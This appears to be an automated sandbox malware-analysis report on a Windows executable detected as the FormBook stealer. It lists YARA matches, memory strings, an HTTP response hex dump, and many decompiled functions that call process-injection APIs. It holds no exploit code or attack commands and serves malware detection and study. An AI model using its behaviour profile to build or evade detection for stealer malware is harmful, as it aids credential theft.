          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Frame-Options: SAMEORIGINDate: Wed, 16 Sep 2020 07:14:45 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00420CC0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0043DD3C GetKeyboardState,0_2_0043DD3C

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture,0_2_00440CB8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045BA98 NtdllDefWindowProc_A,0_2_0045BA98
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0045C240
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0045C2F0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042A524 NtdllDefWindowProc_A,0_2_0042A524
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00450C40
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417940 NtCreateFile,1_2_00417940
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179F0 NtReadFile,1_2_004179F0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417A70 NtClose,1_2_00417A70
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417B20 NtAllocateVirtualMemory,1_2_00417B20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004178FA NtCreateFile,1_2_004178FA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041793A NtCreateFile,1_2_0041793A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179EA NtReadFile,1_2_004179EA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AF98F0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AF9860
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk,1_2_00AF9840
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk,1_2_00AF99A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AF9910
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk,1_2_00AF9A20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AF9A00
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk,1_2_00AF9A50
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF95D0 NtClose,LdrInitializeThunk,1_2_00AF95D0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk,1_2_00AF9540
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AF96E0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AF9660
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AF97A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AF9780
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AF9FE0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AF9710
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF98A0 NtWriteVirtualMemory,1_2_00AF98A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9820 NtEnumerateKey,1_2_00AF9820
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFB040 NtSuspendThread,1_2_00AFB040
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF99D0 NtCreateProcessEx,1_2_00AF99D0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9950 NtQueueApcThread,1_2_00AF9950
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A80 NtOpenDirectoryObject,1_2_00AF9A80
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A10 NtQuerySection,1_2_00AF9A10
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFA3B0 NtGetContextThread,1_2_00AFA3B0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9B00 NtSetValueKey,1_2_00AF9B00
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF95F0 NtQueryInformationFile,1_2_00AF95F0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9520 NtWaitForSingleObject,1_2_00AF9520
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFAD30 NtSetContextThread,1_2_00AFAD30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9560 NtWriteFile,1_2_00AF9560
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF96D0 NtCreateKey,1_2_00AF96D0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9610 NtEnumerateValueKey,1_2_00AF9610
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9670 NtQueryInformationProcess,1_2_00AF9670
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9650 NtQueryValueKey,1_2_00AF9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87A70 NtClose,5_2_02D87A70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87B20 NtAllocateVirtualMemory,5_2_02D87B20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879F0 NtReadFile,5_2_02D879F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87940 NtCreateFile,5_2_02D87940
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D878FA NtCreateFile,5_2_02D878FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879EA NtReadFile,5_2_02D879EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8793A NtCreateFile,5_2_02D8793A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00450C400_2_00450C40
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00455F900_2_00455F90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004010261_2_00401026
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041B10C1_2_0041B10C
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00408A501_2_00408A50
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041BB671_2_0041BB67
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041ADA41_2_0041ADA4
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041BF771_2_0041BF77
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AE20A01_2_00AE20A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B820A81_2_00B820A8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ACB0901_2_00ACB090
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B828EC1_2_00B828EC
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B8E8241_2_00B8E824
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B710021_2_00B71002
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AD41201_2_00AD4120
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ABF9001_2_00ABF900
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B822AE1_2_00B822AE
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AEEBB01_2_00AEEBB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7DBD21_2_00B7DBD2
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B703DA1_2_00B703DA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82B281_2_00B82B28
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AC841F1_2_00AC841F
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7D4661_2_00B7D466
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AE25811_2_00AE2581
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ACD5E01_2_00ACD5E0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B825DD1_2_00B825DD
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AB0D201_2_00AB0D20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82D071_2_00B82D07
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B81D551_2_00B81D55
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82EF71_2_00B82EF7
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AD6E301_2_00AD6E30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7D6161_2_00B7D616
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B81FF11_2_00B81FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D78A505_2_02D78A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8BB675_2_02D8BB67
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8B10C5_2_02D8B10C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72FB05_2_02D72FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8BF775_2_02D8BF77
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8AD9D5_2_02D8AD9D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72D905_2_02D72D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72D875_2_02D72D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 00403FC0 appears 68 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 004060D4 appears 62 times
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
